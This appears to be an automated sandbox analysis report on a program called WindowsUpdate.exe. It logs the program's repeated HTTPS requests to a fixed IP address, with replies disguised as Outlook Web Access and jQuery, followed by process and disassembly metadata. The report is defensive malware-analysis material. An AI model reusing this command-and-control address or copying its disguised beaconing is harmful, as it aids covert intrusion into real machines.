2024-12-18 21:53:30 UTC5537INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
13192.168.2.449835146.56.219.1464436652C:\Users\user\Desktop\WindowsUpdate.exe
TimestampBytes transferredDirectionData
2024-12-18 21:53:36 UTC431OUTGET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:53:37 UTC595INHTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:53:37 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:53:37 UTC5537INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
14192.168.2.449853146.56.219.1464436652C:\Users\user\Desktop\WindowsUpdate.exe
TimestampBytes transferredDirectionData
2024-12-18 21:53:43 UTC431OUTGET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:53:44 UTC595INHTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:53:44 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:53:44 UTC5537INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
15192.168.2.449869146.56.219.1464436652C:\Users\user\Desktop\WindowsUpdate.exe
TimestampBytes transferredDirectionData
2024-12-18 21:53:51 UTC431OUTGET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:53:51 UTC595INHTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:53:51 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:53:51 UTC5537INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
16192.168.2.449886146.56.219.1464436652C:\Users\user\Desktop\WindowsUpdate.exe
TimestampBytes transferredDirectionData
2024-12-18 21:53:58 UTC431OUTGET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:53:59 UTC595INHTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:53:58 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:53:59 UTC5537INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

System Behavior

General

Target ID:0
Start time:16:52:00
Start date:18/12/2024
Path:C:\Users\user\Desktop\WindowsUpdate.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\Desktop\WindowsUpdate.exe"
Imagebase:0x7ff7300a0000
File size:15'360 bytes
MD5 hash:375049AE392572882D3402D0678389EF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:false

Disassembly

Reset < >

    Execution Graph

    Execution Coverage:1.5%
    Dynamic/Decrypted Code Coverage:15.4%
    Signature Coverage:19.2%
    Total number of Nodes:26
    Total number of Limit Nodes:4
    execution_graph 23128 217700e25b4 23131 217700e25c3 fread_s 23128->23131 23130 217700e25fd 23131->23130 23132 217700e2b70 RtlFreeHeap abort 23131->23132 23132->23130 23133 7ff7300a1b24 23134 7ff7300a1b3d __scrt_initialize_crt 23133->23134 23135 7ff7300a1b45 __scrt_acquire_startup_lock 23134->23135 23136 7ff7300a1c7b 23134->23136 23138 7ff7300a1c85 23135->23138 23143 7ff7300a1b63 __scrt_release_startup_lock 23135->23143 23158 7ff7300a21a8 9 API calls 23136->23158 23159 7ff7300a21a8 9 API calls 23138->23159 23140 7ff7300a1c90 23142 7ff7300a1c98 _exit 23140->23142 23141 7ff7300a1b88 23143->23141 23144 7ff7300a1c0e _get_initial_narrow_environment __p___argv __p___argc 23143->23144 23147 7ff7300a1c06 _register_thread_local_exe_atexit_callback 23143->23147 23153 7ff7300a1190 23144->23153 23147->23144 23149 7ff7300a1c37 23149->23140 23150 7ff7300a1c3b 23149->23150 23151 7ff7300a1c40 _cexit 23150->23151 23152 7ff7300a1c45 23150->23152 23151->23152 23152->23141 23156 7ff7300a11f1 23153->23156 23155 7ff7300a15ee 23157 7ff7300a22fc GetModuleHandleW 23155->23157 23160 7ff7300a1a20 8 API calls 2 library calls 23156->23160 23157->23149 23158->23138 23159->23140 23160->23155

    Executed Functions

    Function 00000217700AB050 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 189COMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: NameSocketUser
    • String ID: :$\
    • API String ID: 1092631813-1166558509
    • Opcode ID: 6b67cbf96f5fdd912783bcbec37cf04faf200a28232907d3d2e10b415d149f39
    • Instruction ID: a1d57ba651cee8f7a5c5e9090d0fd58578cc81390eb5b4a87ffb178d98ebd0f1
    • Opcode Fuzzy Hash: 6b67cbf96f5fdd912783bcbec37cf04faf200a28232907d3d2e10b415d149f39
    • Instruction Fuzzy Hash: F371B77461CB488FE791EB28C458B9AFBF1FBDA350F40495DA089C32A2DB74D855CB42
    Function 00007FF7300A1190 Relevance: 5.3, Strings: 4, Instructions: 269COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 100 7ff7300a1190-7ff7300a1210 call 7ff7300a1000 call 7ff7300a1090 call 7ff7300a1610 107 7ff7300a1216-7ff7300a1232 call 7ff7300a1090 call 7ff7300a1610 100->107 108 7ff7300a15da 100->108 107->108 116 7ff7300a1238-7ff7300a1253 call 7ff7300a1090 call 7ff7300a1610 107->116 109 7ff7300a15df-7ff7300a1605 call 7ff7300a1a20 108->109 116->108 121 7ff7300a1259-7ff7300a1274 call 7ff7300a1090 call 7ff7300a1610 116->121 121->108 126 7ff7300a127a-7ff7300a1295 call 7ff7300a1090 call 7ff7300a1610 121->126 126->108 131 7ff7300a129b-7ff7300a12b6 call 7ff7300a1090 call 7ff7300a1610 126->131 131->108 136 7ff7300a12bc-7ff7300a12d7 call 7ff7300a1090 call 7ff7300a1610 131->136 136->108 141 7ff7300a12dd-7ff7300a1384 call 7ff7300a1000 call 7ff7300a1090 call 7ff7300a1000 call 7ff7300a1090 call 7ff7300a19e0 call 7ff7300a19ee 136->141 154 7ff7300a1386-7ff7300a1389 141->154 155 7ff7300a138e-7ff7300a13bc call 7ff7300a19e0 call 7ff7300a19ee 141->155 156 7ff7300a1449-7ff7300a1494 call 7ff7300a19e0 call 7ff7300a19ee 154->156 165 7ff7300a13f1-7ff7300a1404 call 7ff7300a19e0 call 7ff7300a19ee 155->165 166 7ff7300a13be-7ff7300a13ef call 7ff7300a19e0 call 7ff7300a19ee call 7ff7300a19e0 call 7ff7300a19ee 155->166 156->108 168 7ff7300a149a-7ff7300a14a9 156->168 177 7ff7300a1409-7ff7300a1444 call 7ff7300a19e0 call 7ff7300a19ee call 7ff7300a19e0 call 7ff7300a19ee call 7ff7300a1000 165->177 166->156 171 7ff7300a14b0-7ff7300a14cb call 7ff7300a17a0 168->171 181 7ff7300a14cd-7ff7300a14ef 171->181 177->156 184 7ff7300a14f0-7ff7300a14fb 181->184 184->184 187 7ff7300a14fd-7ff7300a1508 184->187 190 7ff7300a1510-7ff7300a1549 187->190 190->190 191 7ff7300a154b-7ff7300a155d 190->191 193 7ff7300a1560-7ff7300a159d 191->193 193->193 196 7ff7300a159f-7ff7300a15ca call 7ff7300a19e0 call 7ff7300a19ee 193->196 202 7ff7300a15cf-7ff7300a15d1 196->202 202->108 203 7ff7300a15d3-7ff7300a15d8 202->203 203->109
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2931290282.00007FF7300A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7300A0000, based on PE: true
    • Associated: 00000000.00000002.2931266883.00007FF7300A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2931332313.00007FF7300A3000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2931352471.00007FF7300A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2931384507.00007FF7300A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff7300a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID: 3232fdee-9343-fac4-2efe-1688a2430753$:$chak$ra.d
    • API String ID: 0-3551511372
    • Opcode ID: 7624542515975530169df7396423b09116c364160f120eae1ee0144e5746f4bb
    • Instruction ID: 68625ddee92903d7e5d4f9f4fedd47f202cca1761d786dd9cd76b60b232a9861
    • Opcode Fuzzy Hash: 7624542515975530169df7396423b09116c364160f120eae1ee0144e5746f4bb
    • Instruction Fuzzy Hash: 2BC1A322B0878195E710EB79D4612FEA761FB8478CF844231EE9D4B78EDE38E561D360
    Function 00007FF7300A1B24 Relevance: 13.6, APIs: 9, Instructions: 94COMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2931290282.00007FF7300A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7300A0000, based on PE: true
    • Associated: 00000000.00000002.2931266883.00007FF7300A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2931332313.00007FF7300A3000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2931352471.00007FF7300A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2931384507.00007FF7300A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff7300a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
    • String ID:
    • API String ID: 120244420-0
    • Opcode ID: 0b44bb002a0341e30d57d8a1f4708f56a702b3bb2d96e1425164fb690bbbdbb0
    • Instruction ID: 771fabbb09b008622b5b5172c2610e1adcda3a5896e15d44f6150a1e59f984d7
    • Opcode Fuzzy Hash: 0b44bb002a0341e30d57d8a1f4708f56a702b3bb2d96e1425164fb690bbbdbb0
    • Instruction Fuzzy Hash: E8311A21E0D14261FA14BB29E4513F9A391AF9578CFC44034EA5E0B7DFDE2DB875A231
    Function 00000217700A22BC Relevance: 3.3, APIs: 2, Instructions: 272networkCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: Internet$AvailableCloseDataHandleQuery
    • String ID:
    • API String ID: 1327592154-0
    • Opcode ID: 0ae40c8b48997cceaf44f927dc327f8fc444c47c9378a20578f9eac3801fbe4d
    • Instruction ID: 268480b23f19e3b079f70738745a8b96a5d69014f51a4cba8ff6d87512d94662
    • Opcode Fuzzy Hash: 0ae40c8b48997cceaf44f927dc327f8fc444c47c9378a20578f9eac3801fbe4d
    • Instruction Fuzzy Hash: 46B1EC7021CB848FE765DB28C458BAAB7F1FBE9311F10492DE58AD32D1DB749845CB42
    Function 00000217700AB2F0 Relevance: 3.1, APIs: 2, Instructions: 104networkCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: IoctlSocket
    • String ID:
    • API String ID: 1409745359-0
    • Opcode ID: f5edf3158a1fce50c76962070a6b834027b3dbd5ded2b52cdb69df401b67b406
    • Instruction ID: d42ffc8f42efc4c032f92e1d1c00733b61e61a7a6281d19b7143294a6b06b661
    • Opcode Fuzzy Hash: f5edf3158a1fce50c76962070a6b834027b3dbd5ded2b52cdb69df401b67b406
    • Instruction Fuzzy Hash: FE41E8B421CB888FE750DF68C44979AFBE1FBD9354F50492DA09AC2291EBB8D455CB02
    Function 00000217700E2574 Relevance: 1.5, APIs: 1, Instructions: 25memoryCOMMONLIBRARYCODE
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 278 217700e2574-217700e2577 279 217700e25b0 278->279 280 217700e2579-217700e2592 RtlFreeHeap 278->280 281 217700e2594-217700e25a9 call 217700e2b70 call 217700e2ab8 280->281 282 217700e25ab-217700e25af 280->282 281->282 282->279
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: FreeHeap
    • String ID:
    • API String ID: 3298025750-0
    • Opcode ID: 8252616606155db50ddcc3771ec12ad1a19af76dd93a1f1e9192e2708b2bc207
    • Instruction ID: 37a95046e440881931922973b736fab2851f9e9d36842f63c67c0c94d2a78b50
    • Opcode Fuzzy Hash: 8252616606155db50ddcc3771ec12ad1a19af76dd93a1f1e9192e2708b2bc207
    • Instruction Fuzzy Hash: 6BE08670705A0D47FB29BBB9DC9D37472E1DBA9211F04056DA801E22D1EA248841C781
    Function 00000217700AF6D0 Relevance: 1.3, APIs: 1, Instructions: 57COMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: FreeVirtual
    • String ID:
    • API String ID: 1263568516-0
    • Opcode ID: f5be3fde2838ca046ca0ae8bd03b28dcec00575a1dc3ba35c2c716bc36948d0e
    • Instruction ID: 630faa483df53fb4f58df00c44bac0ae52c57c0441cb2cc885bb6dc07848a463
    • Opcode Fuzzy Hash: f5be3fde2838ca046ca0ae8bd03b28dcec00575a1dc3ba35c2c716bc36948d0e
    • Instruction Fuzzy Hash: 2D113DB051C6448FE665AB68C40C7AEF6E1FBE6364F50092EE085C21E0CB748856CB52

    Non-executed Functions

    Function 00007FF7300A21A8 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2931290282.00007FF7300A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7300A0000, based on PE: true
    • Associated: 00000000.00000002.2931266883.00007FF7300A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2931332313.00007FF7300A3000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2931352471.00007FF7300A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2931384507.00007FF7300A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff7300a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
    • String ID:
    • API String ID: 313767242-0
    • Opcode ID: ba1b179b665aa6e95bad836ca2731368ce91ff4628614d0814662aa935004a02
    • Instruction ID: 4b766876888369ecbe20fddfeeb68151478885f15009a4dfa83130bf8189e20b
    • Opcode Fuzzy Hash: ba1b179b665aa6e95bad836ca2731368ce91ff4628614d0814662aa935004a02
    • Instruction Fuzzy Hash: 6D31A372609B81A5EB609F64E8507EEB360FB94348F844439DB4E47B88DF3CE168D724
    Function 00007FF7300A2080 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2931290282.00007FF7300A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7300A0000, based on PE: true
    • Associated: 00000000.00000002.2931266883.00007FF7300A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2931332313.00007FF7300A3000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2931352471.00007FF7300A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2931384507.00007FF7300A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff7300a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
    • String ID:
    • API String ID: 2933794660-0
    • Opcode ID: 1f5a085ac05ca1c8060332f51e9b29c6db783efad3389300f5c10334ede8024c
    • Instruction ID: 91e67fd4180956b0e753002939ce8471175675b5a683f7133050a2a6d35aa772
    • Opcode Fuzzy Hash: 1f5a085ac05ca1c8060332f51e9b29c6db783efad3389300f5c10334ede8024c
    • Instruction Fuzzy Hash: A1119126B04F0199EB00DF74E8542B973A0F759718F400E30EF2D42B58DF78E1689360
    Function 00000217700EF3A8 Relevance: 1.8, APIs: 1, Instructions: 321COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: _clrfp
    • String ID:
    • API String ID: 3618594692-0
    • Opcode ID: 5de82274a40e6f25d83ed8c572f8826b578c545ec17eae2ae53d901e69cfe7cf
    • Instruction ID: b4ccf69ffc9c8592c304359b1131fb82193ab6aef659ef6ce3c55ae1f0e2168e
    • Opcode Fuzzy Hash: 5de82274a40e6f25d83ed8c572f8826b578c545ec17eae2ae53d901e69cfe7cf
